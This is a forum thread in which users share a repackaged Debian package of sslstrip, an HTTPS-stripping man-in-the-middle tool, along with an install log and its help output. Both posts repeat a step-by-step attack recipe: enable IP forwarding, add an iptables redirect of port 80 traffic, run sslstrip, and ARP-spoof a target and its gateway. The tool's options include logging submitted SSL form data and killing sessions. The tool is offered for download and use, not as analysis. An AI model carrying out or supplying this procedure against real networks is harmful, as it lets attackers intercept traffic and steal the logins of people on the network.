Active Topics

Notices

Posts: 88 | Thanked: 63 times | Joined on Feb 2008 @ Solingen; Germany
As someone on IRC asked for sslstrip I now took some time and repackaged the package from blackbox PPA to make it work with debhelper5.

#################

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install

Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

[ http://www.thoughtcrime.org/software/sslstrip/ ]
Attached Files
File Type: gz sslstrip0.9_packages+source.tar.gz (141.8 KB, 144 views)

Posts: 458 | Thanked: 783 times | Joined on Jan 2010 @ France
Originally Posted by thopiekar View Post
As someone on IRC asked for sslstrip I now took some time and repackaged the package from blackbox PPA to make it work with debhelper5.

#################

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install

Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

[ http://www.thoughtcrime.org/software/sslstrip/ ]
Well,

Here is the answer of the 'someone' guy

All goes well, except the link to the binary doesn't work & removing the package leave directory of installation ...

Googling a little teach me how to made a 'postinst' & 'prerm'scripts fixing the problem ...

Look in attachment for fixed package with source ...

So to be clear, right now :

Code:
-bash-2.05b# dpkg -i sslstrip_0.9-1_all.deb && sslstrip --help
Selecting previously deselected package sslstrip.
(Reading database ... 38833 files and directories currently installed.)
Unpacking sslstrip (from sslstrip_0.9-1_all.deb) ...
Setting up sslstrip (0.9-1) ...

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

-bash-2.05b#

A++
Attached Files
File Type: gz sslstrip0.9_packages+source.tar.gz (104.1 KB, 95 views)

Last edited by colin.stephane; 2011-07-19 at 18:48. Reason: Fixing also the deletion of package directory when purging ...